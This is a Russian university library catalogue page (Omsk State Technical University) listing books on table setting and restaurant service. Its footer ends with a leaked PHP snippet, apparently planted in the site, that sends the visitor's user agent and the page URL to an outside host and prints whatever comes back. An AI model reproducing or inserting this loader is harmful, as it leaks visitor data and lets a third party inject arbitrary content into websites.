Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

130 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=СЕРВИРОВКА СТОЛА")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 32
1. 
Безупречный сервис [Текст] : кн. для официантов, менеджеров и владельцев ресторанов / Кулинарный институт Америки, 2010. - 263 с.
Держатели документа (Информация об экземплярах) 
2. 
Энциклопедия изысканного стиля [Текст] : 400 лет этикета за столом / пер. с англ, 2009. - 141 с.
Держатели документа (Информация об экземплярах) 
3. 
Инч А. <1 000=тысяча> правил сервировки и столового этикета [Текст] : безупречные рекомендации лучшего английского дворецкого / А. Инч, А. Херст, 2009. - 159 с.
Держатели документа (Информация об экземплярах) 
4. 
Белошапка М. И. Технология ресторанного обслуживания [Текст] : учеб. пособие для образоват. учреждений нач. проф. образования / М. И. Белошапка, 2006. - 223 с.
Держатели документа (Информация об экземплярах) 
5. 
Веселова Т. И. Организация обслуживания [Текст] : учеб.-практ. пособие для студентов специальности 260502 "Технология продукции общественного питания" / Т. И. Веселова, 2010. - 112 с.
Держатели документа (Информация об экземплярах) 
6. 
Организация обслуживания [Текст] : метод. рекомендации и указания к подготовке и проведению практических занятий по теме: "Подготовка к обслуживанию посетителей" для студентов всех форм обучения по специальности 27.11. "Технология продукции общественого питания" / Омский ин-т предпринимательства и права, Каф. технологии и оборудования, 1998. - 17 с.
Держатели документа (Информация об экземплярах) 
7. 
Вольпина В. Б. Азбука домашнего уюта / В. Б. Вольпина ; худож. Н. Румянцева, 2002. - 272 с.
Держатели документа (Информация об экземплярах) 
8. 
Как красиво накрыть стол / ред.: Т. Носенко, Т. Фомина ; пер. с нем. Т. Григорьева, 2001. - 148 с.
Держатели документа (Информация об экземплярах) 
9. 
Бураковская Н. В. Сервисное обслуживание на предприятиях индустрии питания [Текст] : учебное пособие / Н. В. Бураковская, О. В. Пасько, 2012. - 167 с.
Держатели документа (Информация об экземплярах) 
10. 
11. 
Радужан М. Ю. Курс бармена-официанта [Текст] / М. Ю. Радужан, И. Ю. Митева, 2005. - 220 с.
Держатели документа (Информация об экземплярах) 
12. 
Искусство сервировки [Текст] : издания для досуга / пер. с нем. Т. Григорьевой, 2003. - 151 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
13. 
Ресторанный бизнес в России: технология успеха [Текст] / Л. С. Кучер, Л. М. Шкуратова, С. Л. Ефимов, Т. Н. Голубева, 2002. - 465 с.
Ключевые слова 
РЕСТОРАН -- БИЗНЕС ресторанный -- БАР -- РЕСТОРАН - Маркетинг -- МЕРЧАНДАЙЗИНГ -- РЕСТОРАН - РЕКЛАМА -- МЕНЮ РЕСТОРАНА -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ПРИБОР СТОЛОВЫЙ -- КАРТА ВИН -- ОФИЦИАНТ -- ОБСЛУЖИВАНИЕ банкетное -- БАНКЕТ -- СЕРВИРОВКА стола -- БАНКЕТ - КОКТЕЙЛЬ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ комбинированный -- Кейтеринг -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ национальная -- УПРАВЛЕНИЕ рестораном -- ЭТИКА официанта -- РЕСТОРАН - Планирование -- РЕСТОРАН - Налоги
Оглавление 
  • Правила оказания услуг общественнного питания. - с.459-465
Держатели документа (Информация об экземплярах) 
14. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ
15. 
Богушева В. И. Бары и рестораны. Искусство обслуживания [Текст] : [учеб. пособие] / В. И. Богушева, 2001. - 351 с.
Держатели документа (Информация об экземплярах) 
16. 
Барановский В. А. Официант-бармен [Текст] : учеб. пособие для учащихся учеб. заведений начального проф. образования / В. А. Барановский, Л. В. Кулькова, 2002. - 347 с.
Ключевые слова 
ОФИЦИАНТ-бармен -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- БУФЕТ -- БАР -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА СТОЛА -- КУЛЬТУРА ПОВЕДЕНИЯ официанта -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ- ПРИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- БУФЕТ бар -- Банкет с частичным обслуживанием -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ алжирская -- Кухня английская -- Кухня американская -- Кухня канадская -- Кухня арабская -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- ОХРАНА ТРУДА
17. 
Организация обслуживания [Текст] : метод. рек. по проведению практических занятий по теме: "Подготовка предприятия к обслуживанию. Сервировка стола" для студентов специальности 2711 "Технология продукции общественого питания" / Омский ин-т предпринимательства и права, каф. технологии и оборудования, 2005. - 16 с.
Держатели документа (Информация об экземплярах) 
18. 
Белошапка М. И. Технология ресторанного обслуживания [Текст] : учеб. пособие для образоват. учреждений нач. проф. образования / М. И. Белошапка, 2004. - 223 с.
Держатели документа (Информация об экземплярах) 
19. 
Ресторанный сервис. Основы международной практики обслуживания для профессионалов и начинающих [Текст] : справочное издание / С. Зигель и др., 2003. - 287 с.
Ключевые слова 
ОФИЦИАНТ -- ПРИЕМ ГОСТЕЙ -- РЕСТОРАН - ПЕРСОНАЛ -- СОМЕЛЬЕ -- ПОСУДА СТОЛОВАЯ -- ДИЗАЙН ресторана -- СЕРВИРОВКА СТОЛА -- Завтрак - ресторан -- Ленч - ресторан -- МЕНЮ РЕСТОРАНА -- КАРТА ВИН -- БАР -- БУФЕТ -- БАНКЕТ -- КОКТЕЙЛЬ - парти -- Кухня датская -- КУХНЯ австрийская -- КУХНЯ НЕМЕЦКАЯ -- КУХНЯ ИТАЛЬЯНСКАЯ -- КУХНЯ ФРАНЦУЗСКАЯ -- КУХНЯ ИСПАНСКАЯ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ ЯПОНСКАЯ -- КУХНЯ КИТАЙСКАЯ -- КУХНЯ ЕВРЕЙСКАЯ -- Кухня швейцарская -- Кухня шведская
20. 
Браиловская, Людмила Викторовна. Вечеринки для взрослых "Под знаком зодиака". [Текст] / Л. В. Браиловская, 2003. - 284, [3] с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3023 - 19.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.91 с.12 запросов, 0.56c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;